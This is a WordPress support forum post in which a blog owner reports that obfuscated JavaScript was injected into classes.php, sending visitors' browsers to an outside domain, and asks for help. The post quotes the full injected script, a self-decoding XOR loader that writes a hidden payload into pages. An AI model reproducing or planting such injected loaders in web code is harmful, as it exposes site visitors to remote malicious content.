Title: Mysterious code added to classes.php
Last modified: August 19, 2016

---

# Mysterious code added to classes.php

 *  [jimshady](https://wordpress.org/support/users/jimshady/)
 * (@jimshady)
 * [17 years, 2 months ago](https://wordpress.org/support/topic/mysterious-code-added-to-classesphp/)
 * I found my browser running to `analys.in` every time a page on my blog loads.
   Upon further examination, analys.in has its nameservers set to `pc-banking.cn`.
   So I suspect this is some Chinese network collecting information.
 * I have no clue how they managed to get to the files (I have a very strong password,
   and I couldn’t find anything in bash history which goes back a couple of months).
   I checked every installed plugin and couldn’t find any references to the code
   that was added.
 * The specific code that was added?
 * `<script type="text/javascript">function rsec(ggqgbleb) { function qqwze(szxtge){
   var vnus = 0; var dmawfmw = szxtge.length; var ioqlo = 0; while (ioqlo < dmawfmw){
   vnus += (szxtge.charCodeAt(ioqlo))*dmawfmw%255; ioqlo++; } return vnus%255; }
   ggqgbleb=unescape(ggqgbleb); try {var rxgz=arguments.callee;} catch(dgnesfhr){
   alert(dgnesfhr);} imcza=(new String(rxgz)).replace(/[^@a-z0-9A-Z_.,-]/g, '');
   gnzp=qqwze(imcza); vtxfolfz=""; var ogqvggy = 0; for(dxgcgll=0;dxgcgll<ggqgbleb.
   length;dxgcgll++) { vtxfolfz += String.fromCharCode(ggqgbleb.charCodeAt(dxgcgll)
   ^gnzp^imcza.charCodeAt(dxgcgll)^dxgcgll%255^ogqvggy%255); ogqvggy++; if (ogqvggy
   > imcza.length) ogqvggy = 0; } document.write(vtxfolfz); }rsec("%9F%D9%CD%D4%
   D0%C1%CF%8B%C4%C4%C3%9B%80%CA%C0%D6%D7%93%8F%88%C2%DE%CA%CA%C8%DF%84%C2%DA%9B%
   C1%CB%C1%C2%90%D4%DF%8C%C3%D4%CD%88%80%89%90%C5%81%CA%C8%D2%9C%8A%D2%DB%D0%C1%
   D0%DF%D3%D4%C5%DB%9A%CB%C1%C9%CF%C6%D4%C3%88%84%D3%C5%D9%C4%C5%CB%8C%88%8D%C2%
   C6%CE%C9%88%94%DE%C3%C5%DC%CC%8F%81%98%90%93%C3%D5%DF%D1%D7%C9%8C%80%90%C9%98%
   91%8B%DE%E0%D8%C0%CD%E1%8F%8C%8A");</script>`
 * Plugins I have installed:
 *     ```
       1 Blog Cacher
       Add To Any
       Adsense-Deluxe
       All in One SEO Pack
       del.icio.us - Bookmark This
       Google XML Sitemaps
       PHP Speedy WP
       Spam Karma 2
       Textile 2 (Improved)
       WordPress Database Backup
       WP-ContactForm
       WP-DBManager
       ```
   
 * I am stumped. Is this part of the same Chinese botnet news from a few days back??

The topic ‘Mysterious code added to classes.php’ is closed to new replies.

## Tags

 * [botnet](https://wordpress.org/support/topic-tag/botnet/)
 * [exploit](https://wordpress.org/support/topic-tag/exploit/)
 * [Flaw](https://wordpress.org/support/topic-tag/flaw/)
 * [hacked](https://wordpress.org/support/topic-tag/hacked/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 0 replies
 * 1 participant
 * Last reply from: [jimshady](https://wordpress.org/support/users/jimshady/)
 * Last activity: [17 years, 2 months ago](https://wordpress.org/support/topic/mysterious-code-added-to-classesphp/)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics